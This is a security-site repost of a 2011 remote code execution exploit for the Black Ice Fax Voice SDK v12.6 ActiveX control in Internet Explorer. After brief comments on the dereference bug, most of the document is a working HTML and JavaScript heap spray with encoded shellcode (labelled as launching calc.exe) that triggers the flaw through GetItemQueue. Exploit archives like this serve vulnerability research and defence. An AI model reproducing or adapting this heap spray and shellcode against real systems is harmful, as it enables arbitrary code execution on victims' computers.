首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Black Ice Fax Voice SDK v12.6 Remote Code Execution Exploit
来源:vfocus.net 作者:mr_me 发布时间:2011-06-21  

<html>
<!--
Black Ice Fax Voice SDK v12.6 - integer dereference code execution exploit
Date: Jun 20, 2011
Link: http://www.blackice.com/Fax%20C++%20ActiveX.htm
Version: 12.6
Tested on: WinXP - IE 6 & 7
 
Class FAX
GUID: {2E980303-C865-11CF-BA24-444553540000}
Number of Interfaces: 1
Default Interface: _DFAX
RegKey Safe for Script: False
RegkeySafe for Init: False
KillBitSet: False

Meh, despite the above, i found this bug slightly amusing >:)

Theres an integer overflow in this section of fax.ocx which is how i found the dereference vulnerability.

1000CFA3 MOV ECX,[EBP+8]  < --- get our variable into ECX
1000CFA6 MOV EDX,[ECX]    < --- dereference
1000CFA8 MOV ECX,[EBP+8]  < --- get our variable into ECX again (meh)
1000CFAB CALL [EDX+14]  < --- !!!!

and...

EIP 1000CFA6 -> 51EC8B55
EAX 1000CF82 -> 51EC8B55
EBX 0013EC68 -> 01D29E90
ECX FFFFFFFF
EDX 73F360D3 -> EB0C4589
EDI 0013EB98 -> 73F4D682
ESI 00000000
EBP 0013EB94 -> 0013EC10
ESP 0013EB90 -> 0003A1A0

vulnerable methods:
GetFirstItem()
GetItemQueue()

prob more.
-->

<object classid='clsid:2E980303-C865-11CF-BA24-444553540000' id='target'/></object>
<script language='javascript'>
// Calc.exe
var shellcode = unescape(
    '%uc931%ue983%ud9de%ud9ee%u2474%u5bf4%u7381%u3d13%u5e46%u8395'+
    '%ufceb%uf4e2%uaec1%u951a%u463d%ud0d5%ucd01%u9022%u4745%u1eb1'+
    '%u5e72%ucad5%u471d%udcb5%u72b6%u94d5%u77d3%u0c9e%uc291%ue19e'+
    '%u873a%u9894%u843c%u61b5%u1206%u917a%ua348%ucad5%u4719%uf3b5'+
    '%u4ab6%u1e15%u5a62%u7e5f%u5ab6%u94d5%ucfd6%ub102%u8539%u556f'+
    '%ucd59%ua51e%u86b8%u9926%u06b6%u1e52%u5a4d%u1ef3%u4e55%u9cb5'+
    '%uc6b6%u95ee%u463d%ufdd5%u1901%u636f%u105d%u6dd7%u86be%uc525'+
    '%u3855%u7786%u2e4e%u6bc6%u48b7%u6a09%u25da%uf93f%u465e%u955e'
);
 
var nops = unescape('%u0a0a%u0a0a');
var headersize = 20;
var slackspace = headersize + shellcode.length;
while(nops.length < slackspace) {
    nops += nops;
}
var fillblock = nops.substring(0, slackspace);
var block = nops.substring(0, nops.length - slackspace);
while((block.length + slackspace) < 0x50000) {
    block = block + block + fillblock;
}
memory=new Array();
for(counter=0; counter<200; counter++){
    memory[counter] = block + shellcode;
}
var boom = 168430090; // 0x0a0a0a0a
target.GetItemQueue(boom);
</script>
</html>
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Black Ice Cover Page SDK insec
·DATAC RealWin SCADA Server 2 O
·MS11-050 IE mshtml!CObjectElem
·XnView 1.98 Denial of Service
·DreamBox DM800 Arbitrary File
·Gogago YouTube Video Converter
·Jaangle v0.98.971 (.ogg) Local
·FreeBSD/x86 Alphanumeric Bomb
·Internet Explorer6 空指针访问
·OpenBSD/x86 Execve ("/bin/sh")
·MS HyperV Persistent DoS Vulne
·SmartFTP Saved Password Extrac
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved